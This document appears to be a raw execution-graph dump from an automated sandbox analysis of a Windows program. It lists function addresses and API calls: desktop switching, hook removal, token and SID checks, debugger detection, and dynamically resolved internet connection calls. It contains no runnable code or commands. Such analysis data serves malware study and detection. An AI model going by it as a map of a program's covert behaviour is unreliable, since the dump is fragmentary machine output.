                                                                                                                                                                execution_graph 65606 11108d30 65649 1110f420 65606->65649 65609 11108da9 OpenEventA 65612 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 65609->65612 65613 11108e18 CloseHandle GetSystemDirectoryA 65609->65613 65614 1110f420 std::locale::_Init 266 API calls 65612->65614 65615 11108e38 65613->65615 65616 11108f23 65614->65616 65615->65615 65617 11108e40 LoadLibraryA 65615->65617 65619 11108f3c 65616->65619 65726 110f4680 269 API calls std::locale::_Init 65616->65726 65617->65612 65618 11108e71 65617->65618 65693 111450a0 65618->65693 65677 1110f2b0 65619->65677 65622 11108e7b 65625 11108e82 GetProcAddress 65622->65625 65626 11108e9a GetProcAddress 65622->65626 65625->65626 65628 11108ec4 FreeLibrary 65626->65628 65629 11108eb6 65626->65629 65628->65612 65629->65612 65631 11109005 65729 11161d01 65631->65729 65632 1110f420 std::locale::_Init 266 API calls 65634 11108f73 65632->65634 65636 11108f84 65634->65636 65637 11108f8d 65634->65637 65635 1110901f 65727 110f4680 269 API calls std::locale::_Init 65636->65727 65639 1110f2b0 425 API calls 65637->65639 65640 11108fa9 CloseHandle 65639->65640 65641 111450a0 std::locale::_Init 90 API calls 65640->65641 65642 11108fba 65641->65642 65642->65631 65643 1110f420 std::locale::_Init 266 API calls 65642->65643 65644 11108fc8 65643->65644 65645 11108fe2 65644->65645 65728 110f4680 269 API calls std::locale::_Init 65644->65728 65647 1110f2b0 425 API calls 65645->65647 65648 11108ffe CloseHandle 65647->65648 65648->65631 65737 11162b51 65649->65737 65652 1110f447 wsprintfA 65754 11029450 266 API calls 2 library calls 65652->65754 65655 1110f473 _memset 65656 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65655->65656 65657 11108d91 65656->65657 65657->65609 65658 11107290 65657->65658 65763 1110f520 65658->65763 65661 1110f520 3 API calls 65662 111072dc 65661->65662 65663 1110f520 3 API calls 65662->65663 65664 111072ee 65663->65664 65665 1110f520 3 API calls 65664->65665 65666 111072ff 65665->65666 65667 1110f520 3 API calls 65666->65667 65668 11107310 65667->65668 65669 1110f420 std::locale::_Init 266 API calls 65668->65669 65670 11107321 65669->65670 65671 1110740a 65670->65671 65672 1110732c LoadLibraryA LoadLibraryA 65670->65672 65770 1116219a 66 API calls std::exception::_Copy_str 65671->65770 65672->65609 65674 11107419 65771 111625f1 RaiseException 65674->65771 65676 1110742e 65678 1110f2d0 CreateThread 65677->65678 65679 1110f2bf CreateEventA 65677->65679 65681 1110f2f6 65678->65681 65682 1110f30d 65678->65682 65775 11102c50 65678->65775 65797 1110fde0 65678->65797 65811 11027270 65678->65811 65836 1102c410 65678->65836 65679->65678 65774 11029450 266 API calls 2 library calls 65681->65774 65684 1110f311 WaitForSingleObject CloseHandle 65682->65684 65685 11108f58 CloseHandle 65682->65685 65684->65685 65687 1109e9e0 65685->65687 65688 1109e9ef GetCurrentProcess OpenProcessToken 65687->65688 65689 1109ea2d 65687->65689 65688->65689 65690 1109ea12 65688->65690 65689->65631 65689->65632 66216 1109e910 65690->66216 65692 1109ea1b CloseHandle 65692->65689 65694 111450c1 GetVersionExA 65693->65694 65702 1114529c 65693->65702 65695 111450e3 65694->65695 65694->65702 65697 111450f0 RegOpenKeyExA 65695->65697 65695->65702 65696 111452a5 65698 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65696->65698 65700 1114511d _memset 65697->65700 65697->65702 65701 111452b2 65698->65701 65699 11145304 65703 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65699->65703 66229 11143000 RegQueryValueExA 65700->66229 65701->65622 65702->65696 65702->65699 66240 11081c60 65702->66240 65704 11145314 65703->65704 65704->65622 65708 111452ec 65708->65696 65712 11162de7 std::locale::_Init 79 API calls 65708->65712 65709 11143000 std::locale::_Init RegQueryValueExA 65710 11145189 65709->65710 65711 1114528f RegCloseKey 65710->65711 66231 11162de7 65710->66231 65711->65702 65714 111452fd 65712->65714 65714->65696 65714->65699 65717 111451ad 65718 111451c6 65717->65718 65719 11163a2d __input_l 79 API calls 65717->65719 65720 11162de7 std::locale::_Init 79 API calls 65718->65720 65719->65717 65721 111451d2 _strncpy 65720->65721 65722 11143000 std::locale::_Init RegQueryValueExA 65721->65722 65725 11145271 65721->65725 65723 11145248 65722->65723 65724 11143000 std::locale::_Init RegQueryValueExA 65723->65724 65724->65725 65725->65711 65726->65619 65727->65637 65728->65645 65730 11161d0b IsDebuggerPresent 65729->65730 65731 11161d09 65729->65731 66388 11177637 65730->66388 65731->65635 65734 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 65735 1116bcb6 __call_reportfault 65734->65735 65736 1116bcbe GetCurrentProcess TerminateProcess 65734->65736 65735->65736 65736->65635 65738 11162bce 65737->65738 65745 11162b5f 65737->65745 65761 1116d4a8 DecodePointer 65738->65761 65740 11162bd4 65762 111692ef 66 API calls __getptd_noexit 65740->65762 65743 11162b8d RtlAllocateHeap 65743->65745 65753 1110f43e 65743->65753 65745->65743 65746 11162b6a 65745->65746 65747 11162bba 65745->65747 65751 11162bb8 65745->65751 65758 1116d4a8 DecodePointer 65745->65758 65746->65745 65755 1116d99d 66 API calls __NMSG_WRITE 65746->65755 65756 1116d7ee 66 API calls 6 library calls 65746->65756 65757 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 65746->65757 65759 111692ef 66 API calls __getptd_noexit 65747->65759 65760 111692ef 66 API calls __getptd_noexit 65751->65760 65753->65652 65753->65655 65755->65746 65756->65746 65758->65745 65759->65751 65760->65753 65761->65740 65762->65753 65764 1110f536 CreateEventA 65763->65764 65765 1110f549 65763->65765 65764->65765 65766 1110f557 65765->65766 65772 1110f260 InterlockedIncrement 65765->65772 65768 111072cc 65766->65768 65773 1110f3c0 InterlockedIncrement 65766->65773 65768->65661 65770->65674 65771->65676 65772->65766 65773->65768 65871 11089280 65775->65871 65777 11102c5d 65778 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 65777->65778 65779 11102ccf GetLastError 65778->65779 65780 11102c8f SetThreadDesktop 65778->65780 65783 11146450 std::locale::_Init 21 API calls 65779->65783 65781 11102cb1 GetLastError 65780->65781 65782 11102c9a 65780->65782 65785 11146450 std::locale::_Init 21 API calls 65781->65785 65882 11146450 65782->65882 65786 11102ce1 65783->65786 65788 11102cc3 CloseDesktop 65785->65788 65876 11102bd0 65786->65876 65788->65786 65790 11102ceb 65888 1110f340 65790->65888 65792 11102cf2 65893 110f4740 16 API calls 65792->65893 65794 11102cf9 65894 1110f370 SetEvent PulseEvent 65794->65894 65796 11102d00 std::ios_base::_Tidy 65947 110b7a20 65797->65947 65799 1110fdee GetCurrentThreadId 65800 1110f340 267 API calls 65799->65800 65809 1110fe09 std::ios_base::_Tidy 65800->65809 65801 1110fe20 WaitForSingleObject 65949 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 65801->65949 65803 1110fe8a 65805 1110fe43 65806 1110fe53 PostMessageA 65805->65806 65807 1110fe58 PostThreadMessageA 65805->65807 65806->65809 65807->65809 65808 1110fe80 65951 1110f370 SetEvent PulseEvent 65808->65951 65809->65801 65809->65805 65809->65808 65950 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 65809->65950 65812 110272a2 65811->65812 65813 11089280 5 API calls 65812->65813 65814 110272a9 CreateEventA 65813->65814 65815 1110f420 std::locale::_Init 266 API calls 65814->65815 65816 110272c6 65815->65816 65817 110272e7 65816->65817 65952 111100d0 65816->65952 65819 1110f340 267 API calls 65817->65819 65832 110272ff 65819->65832 65820 11027316 WaitForMultipleObjects 65821 1102732d 65820->65821 65820->65832 65823 11027336 PostMessageA 65821->65823 65824 1102734a SetEvent Sleep 65821->65824 65822 110273f4 65825 1102740e CloseHandle 65822->65825 65981 1110fc70 279 API calls 2 library calls 65822->65981 65823->65824 65823->65832 65824->65832 65982 1110f370 SetEvent PulseEvent 65825->65982 65826 11027375 PostMessageA 65826->65832 65829 11027405 std::ios_base::_Tidy 65829->65825 65830 11027423 65832->65820 65832->65822 65832->65826 65833 110273ba GetCurrentThreadId GetThreadDesktop 65832->65833 65980 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 65832->65980 65833->65832 65834 110273c9 SetThreadDesktop 65833->65834 65834->65832 65835 110273d4 CloseDesktop 65834->65835 65835->65832 65837 1102c442 65836->65837 65838 1110f340 267 API calls 65837->65838 65839 1102c44f WaitForSingleObject 65838->65839 65840 1102c466 65839->65840 65841 1102c67d 65839->65841 65842 1102c470 GetTickCount 65840->65842 65843 1102c666 WaitForSingleObject 65840->65843 66080 1110f370 SetEvent PulseEvent 65841->66080 65986 110d1550 65842->65986 65843->65840 65843->65841 65846 1102c684 CloseHandle 66081 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 65846->66081 65848 110d1550 269 API calls 65860 1102c486 65848->65860 65849 1102c695 std::ios_base::_Tidy 65851 1102c6b4 66082 11029450 266 API calls 2 library calls 65851->66082 65853 1102c6c8 66083 11029450 266 API calls 2 library calls 65853->66083 65855 1102c6dc 66084 11029450 266 API calls 2 library calls 65855->66084 65858 1102c6f0 66085 11029450 266 API calls 2 library calls 65858->66085 65859 1102c574 GetTickCount 65870 1102c571 std::ios_base::_Tidy 65859->65870 65860->65848 65860->65851 65860->65853 65860->65855 65860->65859 65996 110d0710 65860->65996 66008 11029590 LoadLibraryA 65860->66008 66060 110d1370 270 API calls 2 library calls 65860->66060 65864 11146450 std::locale::_Init 21 API calls 65864->65870 65865 110d07c0 266 API calls 65865->65870 65868 110679c0 299 API calls 65868->65870 65870->65851 65870->65853 65870->65858 65870->65859 65870->65864 65870->65865 65870->65868 66061 11142290 65870->66061 66070 11042530 268 API calls 2 library calls 65870->66070 66071 110d07c0 65870->66071 65895 1110f6c0 65871->65895 65873 11089290 65874 110892b3 65873->65874 65875 110892a2 UnhookWindowsHookEx 65873->65875 65874->65777 65875->65874 65877 1110f420 std::locale::_Init 266 API calls 65876->65877 65878 11102bfd 65877->65878 65879 11102c30 65878->65879 65901 11102ab0 65878->65901 65879->65790 65881 11102c1d 65881->65790 65883 11146461 65882->65883 65884 1114645c 65882->65884 65921 111458f0 65883->65921 65924 111456a0 18 API calls std::locale::_Init 65884->65924 65889 1110f360 SetEvent 65888->65889 65890 1110f349 65888->65890 65889->65792 65946 11029450 266 API calls 2 library calls 65890->65946 65893->65794 65894->65796 65896 1110f6d7 EnterCriticalSection 65895->65896 65897 1110f6ce GetCurrentThreadId 65895->65897 65898 1110f6ee ___DllMainCRTStartup 65896->65898 65897->65896 65899 1110f6f5 LeaveCriticalSection 65898->65899 65900 1110f708 LeaveCriticalSection 65898->65900 65899->65873 65900->65873 65908 1115f550 65901->65908 65904 11102b81 CreateWindowExA 65904->65881 65905 11102b17 std::locale::_Init 65906 11102b50 GetStockObject RegisterClassA 65905->65906 65906->65904 65907 11102b7a 65906->65907 65907->65904 65911 1115e380 GlobalAddAtomA 65908->65911 65912 1115e3b5 GetLastError wsprintfA 65911->65912 65913 1115e407 GlobalAddAtomA GlobalAddAtomA 65911->65913 65920 11029450 266 API calls 2 library calls 65912->65920 65915 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65913->65915 65917 11102ae1 GlobalAddAtomA 65915->65917 65917->65904 65917->65905 65925 111457a0 65921->65925 65923 11102ca5 CloseDesktop 65923->65786 65924->65883 65926 111457c4 65925->65926 65927 111457c9 65925->65927 65945 111456a0 18 API calls std::locale::_Init 65926->65945 65929 11145832 65927->65929 65930 111457d2 65927->65930 65931 111458de 65929->65931 65932 1114583f wsprintfA 65929->65932 65933 11145809 65930->65933 65936 111457e0 65930->65936 65934 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65931->65934 65935 11145862 65932->65935 65939 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65933->65939 65937 111458ea 65934->65937 65935->65935 65938 11145869 wvsprintfA 65935->65938 65942 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65936->65942 65937->65923 65941 11145884 65938->65941 65940 1114582e 65939->65940 65940->65923 65941->65941 65944 111458d1 OutputDebugStringA 65941->65944 65943 11145805 65942->65943 65943->65923 65944->65931 65945->65927 65948 110b7a28 std::locale::_Init 65947->65948 65948->65799 65949->65809 65950->65809 65951->65803 65953 1110f420 std::locale::_Init 266 API calls 65952->65953 65954 11110101 65953->65954 65955 11110123 GetCurrentThreadId InitializeCriticalSection 65954->65955 65956 1110f420 std::locale::_Init 266 API calls 65954->65956 65959 11110190 EnterCriticalSection 65955->65959 65960 11110183 InitializeCriticalSection 65955->65960 65958 1111011c 65956->65958 65958->65955 65983 1116219a 66 API calls std::exception::_Copy_str 65958->65983 65961 1111024a LeaveCriticalSection 65959->65961 65962 111101be CreateEventA 65959->65962 65960->65959 65961->65817 65964 111101d1 65962->65964 65965 111101e8 65962->65965 65985 11029450 266 API calls 2 library calls 65964->65985 65966 1110f420 std::locale::_Init 266 API calls 65965->65966 65970 111101ef 65966->65970 65967 1111013f 65984 111625f1 RaiseException 65967->65984 65972 111100d0 419 API calls 65970->65972 65973 1111020c 65970->65973 65972->65973 65974 1110f420 std::locale::_Init 266 API calls 65973->65974 65975 1111021c 65974->65975 65976 1111022d 65975->65976 65977 1110f520 3 API calls 65975->65977 65978 1110f2b0 419 API calls 65976->65978 65977->65976 65979 11110245 65978->65979 65979->65961 65980->65832 65981->65829 65982->65830 65983->65967 65984->65955 66086 110d1480 65986->66086 65989 110d159b 65991 110d15b5 65989->65991 65994 110d1598 65989->65994 65990 110d1584 66100 11029450 266 API calls 2 library calls 65990->66100 65991->65860 65994->65989 66101 11029450 266 API calls 2 library calls 65994->66101 65997 110d0724 65996->65997 66141 11163cf8 65997->66141 66004 110d077c 66004->65860 66005 110d0765 66166 11029450 266 API calls 2 library calls 66005->66166 66053 11029621 std::ios_base::_Tidy 66008->66053 66009 11029653 GetProcAddress 66012 11029671 SetLastError 66009->66012 66009->66053 66010 11029748 InternetOpenA 66010->66053 66011 1102972f GetProcAddress 66011->66010 66013 11029779 SetLastError 66011->66013 66012->66053 66013->66053 66014 110296a5 GetProcAddress 66015 11029762 SetLastError 66014->66015 66014->66053 66016 110296d2 GetLastError 66015->66016 66016->66053 66017 11142290 std::locale::_Init 266 API calls 66017->66053 66018 11162be5 66 API calls _free 66018->66053 66019 110296f5 GetProcAddress 66020 1102976f SetLastError 66019->66020 66019->66053 66020->66053 66021 11029a40 66026 11029b76 GetProcAddress 66021->66026 66027 11029a31 66021->66027 66022 11162b51 66 API calls _malloc 66022->66053 66023 11029bb0 66023->65870 66024 11029ba9 FreeLibrary 66024->66023 66025 11029a57 GetProcAddress 66028 11029b2e SetLastError 66025->66028 66049 11029a1a std::ios_base::_Tidy 66025->66049 66026->66027 66029 11029b97 SetLastError 66026->66029 66027->66023 66027->66024 66050 11029b36 std::ios_base::_Tidy 66028->66050 66029->66027 66030 11081a70 IsDBCSLeadByte 66030->66053 66032 11029b5b 66201 110278a0 GetProcAddress SetLastError 66032->66201 66034 1102982b GetProcAddress 66035 1102983e InternetConnectA 66034->66035 66038 11029881 SetLastError 66034->66038 66035->66053 66037 110297ff GetProcAddress 66040 1102981c SetLastError 66037->66040 66037->66053 66038->66053 66039 11029b6a 66039->66021 66040->66053 66042 11029864 GetProcAddress 66044 11029891 SetLastError 66042->66044 66042->66053 66043 110298a3 GetProcAddress 66045 110298d6 SetLastError 66043->66045 66043->66053 66044->66053 66045->66053 66046 110d1090 269 API calls 66047 11029a80 std::ios_base::_Tidy 66046->66047 66047->66046 66047->66049 66047->66050 66192 1110f4a0 66047->66192 66199 11027850 GetProcAddress SetLastError 66047->66199 66048 110298f1 GetProcAddress 66051 11029918 SetLastError 66048->66051 66048->66053 66049->66021 66049->66025 66049->66027 66049->66047 66200 110278a0 GetProcAddress SetLastError 66050->66200 66052 11029922 GetLastError 66051->66052 66052->66053 66054 1102993d GetProcAddress 66052->66054 66053->66009 66053->66010 66053->66011 66053->66014 66053->66016 66053->66017 66053->66018 66053->66019 66053->66022 66053->66030 66053->66034 66053->66035 66053->66037 66053->66042 66053->66043 66053->66048 66053->66049 66053->66052 66056 11029975 GetLastError 66053->66056 66057 1102998c GetDesktopWindow 66053->66057 66054->66053 66055 1102996d SetLastError 66054->66055 66055->66056 66056->66053 66056->66057 66057->66053 66058 1102999a GetProcAddress 66057->66058 66058->66053 66059 110299d6 SetLastError 66058->66059 66059->66053 66060->65860 66062 1114229a 66061->66062 66063 1114229c 66061->66063 66062->65870 66064 1110f4a0 std::locale::_Init 266 API calls 66063->66064 66065 111422c2 66064->66065 66066 111422cb _strncpy 66065->66066 66067 111422e9 66065->66067 66066->65870 66203 11029450 266 API calls 2 library calls 66067->66203 66070->65870 66204 110d05c0 66071->66204 66074 110d07e9 66209 11162be5 66074->66209 66075 110d07d2 66208 11029450 266 API calls 2 library calls 66075->66208 66079 110d07f2 66079->65843 66080->65846 66081->65849 66087 110d148c 66086->66087 66088 110d14a7 66087->66088 66089 110d1490 66087->66089 66102 110d0190 66088->66102 66131 11029450 266 API calls 2 library calls 66089->66131 66096 110d14de 66096->65989 66096->65990 66097 110d14c7 66132 11029450 266 API calls 2 library calls 66097->66132 66103 110d0199 66102->66103 66104 110d019d 66103->66104 66106 110d01b4 66103->66106 66133 11029450 266 API calls 2 library calls 66104->66133 66107 110d01b1 66106->66107 66108 110d01e8 66106->66108 66107->66106 66134 11029450 266 API calls 2 library calls 66107->66134 66110 110d01e5 66108->66110 66111 110d0206 66108->66111 66110->66108 66135 11029450 266 API calls 2 library calls 66110->66135 66114 110d1090 66111->66114 66115 110d109e 66114->66115 66116 110d10b9 66115->66116 66117 110d10a2 66115->66117 66119 110d10ec 66116->66119 66120 110d10b6 66116->66120 66136 11029450 266 API calls 2 library calls 66117->66136 66121 110d1160 66119->66121 66138 110d09e0 266 API calls std::locale::_Init 66119->66138 66120->66116 66137 11029450 266 API calls 2 library calls 66120->66137 66121->66096 66121->66097 66123 110d1113 66127 110d111f _memmove 66123->66127 66139 110d0920 269 API calls 2 library calls 66123->66139 66127->66121 66128 110d1149 66127->66128 66140 11029450 266 API calls 2 library calls 66128->66140 66138->66123 66139->66127 66142 110d072f 66141->66142 66143 11163d09 _strlen 66141->66143 66149 110d0450 66142->66149 66144 11162b51 _malloc 66 API calls 66143->66144 66145 11163d1c 66144->66145 66145->66142 66167 1116be9f 66145->66167 66150 110d045b 66149->66150 66151 110d0472 66149->66151 66188 11029450 266 API calls 2 library calls 66150->66188 66154 110cfe70 66151->66154 66155 110cfe7d 66154->66155 66156 110cfe98 66155->66156 66157 110cfe81 66155->66157 66158 110cfeb6 66156->66158 66161 110cfe95 66156->66161 66189 11029450 266 API calls 2 library calls 66157->66189 66162 110cfeb3 66158->66162 66165 110cfed9 66158->66165 66161->66156 66190 11029450 266 API calls 2 library calls 66161->66190 66162->66158 66191 11029450 266 API calls 2 library calls 66162->66191 66165->66004 66165->66005 66168 1116beb4 66167->66168 66169 1116bead 66167->66169 66179 111692ef 66 API calls __getptd_noexit 66168->66179 66169->66168 66172 1116bed2 66169->66172 66171 1116beb9 66180 1116df04 11 API calls _raise 66171->66180 66174 11163d2e 66172->66174 66181 111692ef 66 API calls __getptd_noexit 66172->66181 66174->66142 66176 1116deb2 66174->66176 66182 1116dd89 66176->66182 66179->66171 66180->66174 66181->66171 66183 1116dda8 _memset __call_reportfault 66182->66183 66184 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 66183->66184 66185 1116de94 __call_reportfault 66184->66185 66186 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66185->66186 66187 1116deb0 GetCurrentProcess TerminateProcess 66186->66187 66187->66142 66193 11162b51 _malloc 66 API calls 66192->66193 66194 1110f4ae 66193->66194 66195 1110f4b7 66194->66195 66198 1110f4ce _memset 66194->66198 66202 11029450 266 API calls 2 library calls 66195->66202 66198->66047 66199->66047 66200->66032 66201->66039 66205 110d05d9 66204->66205 66206 110d05ec 66204->66206 66205->66206 66207 110d0450 266 API calls 66205->66207 66206->66074 66206->66075 66207->66206 66210 11162bf0 HeapFree 66209->66210 66214 11162c19 __dosmaperr 66209->66214 66211 11162c05 66210->66211 66210->66214 66215 111692ef 66 API calls __getptd_noexit 66211->66215 66213 11162c0b GetLastError 66213->66214 66214->66079 66215->66213 66217 1109e9c6 66216->66217 66218 1109e930 GetTokenInformation 66216->66218 66220 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66217->66220 66219 1109e952 _strupr_s_l_stat 66218->66219 66219->66217 66222 1109e958 GetTokenInformation 66219->66222 66221 1109e9d8 66220->66221 66221->65692 66222->66217 66223 1109e96a 66222->66223 66224 1109e99f EqualSid 66223->66224 66225 1109e973 AllocateAndInitializeSid 66223->66225 66224->66217 66226 1109e9ad 66224->66226 66225->66217 66225->66224 66227 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66226->66227 66228 1109e9c2 66227->66228 66228->65692 66230 1114302a 66229->66230 66230->65709 66232 11162dd1 66231->66232 66250 1116364b 66232->66250 66235 11163a2d 66236 11163a4d 66235->66236 66237 11163a3b 66235->66237 66385 111639dc 79 API calls 2 library calls 66236->66385 66237->65717 66239 11163a57 66239->65717 66241 11081c6d 66240->66241 66242 11081c72 66240->66242 66386 11081990 IsDBCSLeadByte 66241->66386 66244 11081c7b 66242->66244 66249 11081c93 66242->66249 66387 11163784 85 API calls 2 library calls 66244->66387 66246 11081c99 66246->65708 66247 11081c8c 66247->65708 66248 11165797 85 API calls std::locale::_Init 66248->66249 66249->66246 66249->66248 66251 11163664 66250->66251 66254 11163420 66251->66254 66266 11163399 66254->66266 66256 11163444 66274 111692ef 66 API calls __getptd_noexit 66256->66274 66259 11163449 66275 1116df04 11 API calls _raise 66259->66275 66262 1116347a 66264 111634c1 66262->66264 66276 11170c05 79 API calls 3 library calls 66262->66276 66265 1114519e 66264->66265 66277 111692ef 66 API calls __getptd_noexit 66264->66277 66265->66235 66267 111633f9 66266->66267 66268 111633ac 66266->66268 66267->66256 66267->66262 66278 1116b7b5 66268->66278 66271 111633d9 66271->66267 66298 11170744 68 API calls 6 library calls 66271->66298 66274->66259 66275->66265 66276->66262 66277->66265 66299 1116b73c GetLastError 66278->66299 66280 1116b7bd 66282 111633b1 66280->66282 66313 1116d7aa 66 API calls 3 library calls 66280->66313 66282->66271 66283 111704a8 66282->66283 66284 111704b4 _raise 66283->66284 66285 1116b7b5 __getptd 66 API calls 66284->66285 66286 111704b9 66285->66286 66287 111704e7 66286->66287 66289 111704cb 66286->66289 66336 1117373c 66287->66336 66290 1116b7b5 __getptd 66 API calls 66289->66290 66293 111704d0 66290->66293 66291 111704ee 66343 1117045b 74 API calls 3 library calls 66291->66343 66295 111704de _raise 66293->66295 66335 1116d7aa 66 API calls 3 library calls 66293->66335 66294 11170502 66344 11170515 LeaveCriticalSection _doexit 66294->66344 66295->66271 66298->66267 66314 1116b5fa TlsGetValue 66299->66314 66302 1116b7a9 SetLastError 66302->66280 66305 1116b76f DecodePointer 66306 1116b784 66305->66306 66307 1116b7a0 66306->66307 66308 1116b788 66306->66308 66310 11162be5 _free 62 API calls 66307->66310 66323 1116b688 66 API calls 4 library calls 66308->66323 66312 1116b7a6 66310->66312 66311 1116b790 GetCurrentThreadId 66311->66302 66312->66302 66315 1116b60f DecodePointer TlsSetValue 66314->66315 66316 1116b62a 66314->66316 66315->66316 66316->66302 66317 11169dbe 66316->66317 66320 11169dc7 66317->66320 66319 11169e04 66319->66302 66319->66305 66320->66319 66321 11169de5 Sleep 66320->66321 66324 11170166 66320->66324 66322 11169dfa 66321->66322 66322->66319 66322->66320 66323->66311 66325 11170172 66324->66325 66326 1117018d 66324->66326 66325->66326 66327 1117017e 66325->66327 66329 111701a0 RtlAllocateHeap 66326->66329 66331 111701c7 66326->66331 66334 1116d4a8 DecodePointer 66326->66334 66333 111692ef 66 API calls __getptd_noexit 66327->66333 66329->66326 66329->66331 66330 11170183 66330->66320 66331->66320 66333->66330 66334->66326 66337 11173764 EnterCriticalSection 66336->66337 66338 11173751 66336->66338 66337->66291 66345 1117367a 66338->66345 66340 11173757 66340->66337 66372 1116d7aa 66 API calls 3 library calls 66340->66372 66343->66294 66344->66293 66346 11173686 _raise 66345->66346 66347 11173696 66346->66347 66348 111736ae 66346->66348 66373 1116d99d 66 API calls __NMSG_WRITE 66347->66373 66354 111736bc _raise 66348->66354 66376 11169d79 66348->66376 66350 1117369b 66374 1116d7ee 66 API calls 6 library calls 66350->66374 66354->66340 66355 111736a2 66375 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 66355->66375 66356 111736ce 66382 111692ef 66 API calls __getptd_noexit 66356->66382 66357 111736dd 66360 1117373c __lock 65 API calls 66357->66360 66361 111736e4 66360->66361 66363 11173717 66361->66363 66364 111736ec InitializeCriticalSectionAndSpinCount 66361->66364 66367 11162be5 _free 65 API calls 66363->66367 66365 11173708 66364->66365 66366 111736fc 66364->66366 66384 11173733 LeaveCriticalSection _doexit 66365->66384 66368 11162be5 _free 65 API calls 66366->66368 66367->66365 66369 11173702 66368->66369 66383 111692ef 66 API calls __getptd_noexit 66369->66383 66373->66350 66374->66355 66378 11169d82 66376->66378 66377 11162b51 _malloc 65 API calls 66377->66378 66378->66377 66379 11169db8 66378->66379 66380 11169d99 Sleep 66378->66380 66379->66356 66379->66357 66381 11169dae 66380->66381 66381->66378 66381->66379 66382->66354 66383->66365 66384->66354 66385->66239 66386->66242 66387->66247 66388->65734 66389 11115b70 66407 11145320 66389->66407 66392 11115bb5 66393 11115bc4 CoInitialize CoCreateInstance 66392->66393 66394 11115b98 66392->66394 66395 11115bf4 LoadLibraryA 66393->66395 66406 11115be9 66393->66406 66396 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66394->66396 66398 11115c10 GetProcAddress 66395->66398 66395->66406 66399 11115ba6 66396->66399 66397 111450a0 std::locale::_Init 90 API calls 66397->66392 66400 11115c20 SHGetSettings 66398->66400 66401 11115c34 FreeLibrary 66398->66401 66400->66401 66401->66406 66402 11115cd1 CoUninitialize 66403 11115cd7 66402->66403 66404 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66403->66404 66405 11115ce6 66404->66405 66406->66402 66406->66403 66408 111450a0 std::locale::_Init 90 API calls 66407->66408 66409 11115b8e 66408->66409 66409->66392 66409->66394 66409->66397 66410 11025d00 66411 11025d0e GetProcAddress 66410->66411 66412 11025d1f 66410->66412 66411->66412 66413 11025d38 66412->66413 66414 11025d2c K32GetProcessImageFileNameA 66412->66414 66416 11025d3e GetProcAddress 66413->66416 66417 11025d4f 66413->66417 66414->66413 66415 11025d71 66414->66415 66416->66417 66418 11025d56 66417->66418 66419 11025d67 SetLastError 66417->66419 66419->66415 66420 11173a35 66421 1116b7b5 __getptd 66 API calls 66420->66421 66422 11173a52 _LcidFromHexString 66421->66422 66423 11173a5f GetLocaleInfoA 66422->66423 66424 11173a86 66423->66424 66425 11173a92 66423->66425 66428 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66424->66428 66443 111646ce 85 API calls 2 library calls 66425->66443 66427 11173a9e 66430 11173aa8 GetLocaleInfoA 66427->66430 66436 11173ad8 _CountryEnumProc@4 _strlen 66427->66436 66429 11173c02 66428->66429 66430->66424 66431 11173ac7 66430->66431 66444 111646ce 85 API calls 2 library calls 66431->66444 66432 11173b4b GetLocaleInfoA 66432->66424 66434 11173b6e 66432->66434 66446 111646ce 85 API calls 2 library calls 66434->66446 66436->66424 66436->66432 66437 11173ad2 66437->66436 66445 11163784 85 API calls 2 library calls 66437->66445 66438 11173b79 66438->66424 66441 11173b81 _strlen 66438->66441 66447 111646ce 85 API calls 2 library calls 66438->66447 66441->66424 66448 111739da GetLocaleInfoW _GetPrimaryLen _strlen 66441->66448 66443->66427 66444->66437 66445->66436 66446->66438 66447->66441 66448->66424 66449 1102e640 66450 1102e683 66449->66450 66451 1110f420 std::locale::_Init 266 API calls 66450->66451 66452 1102e68a 66451->66452 66454 1102e6aa 66452->66454 67512 11142a60 66452->67512 66846 11142bb0 66454->66846 66457 1102e701 66460 11142bb0 86 API calls 66457->66460 66459 1102e6e6 66461 11081bb0 86 API calls 66459->66461 66462 1102e72a 66460->66462 66461->66457 66463 11162de7 std::locale::_Init 79 API calls 66462->66463 66467 1102e737 66462->66467 66463->66467 66464 1102e766 66465 1102e7e5 CreateEventA 66464->66465 66466 1102e7bf GetSystemMetrics 66464->66466 66473 1102e805 66465->66473 66474 1102e819 66465->66474 66466->66465 66468 1102e7ce 66466->66468 66467->66464 66469 111450a0 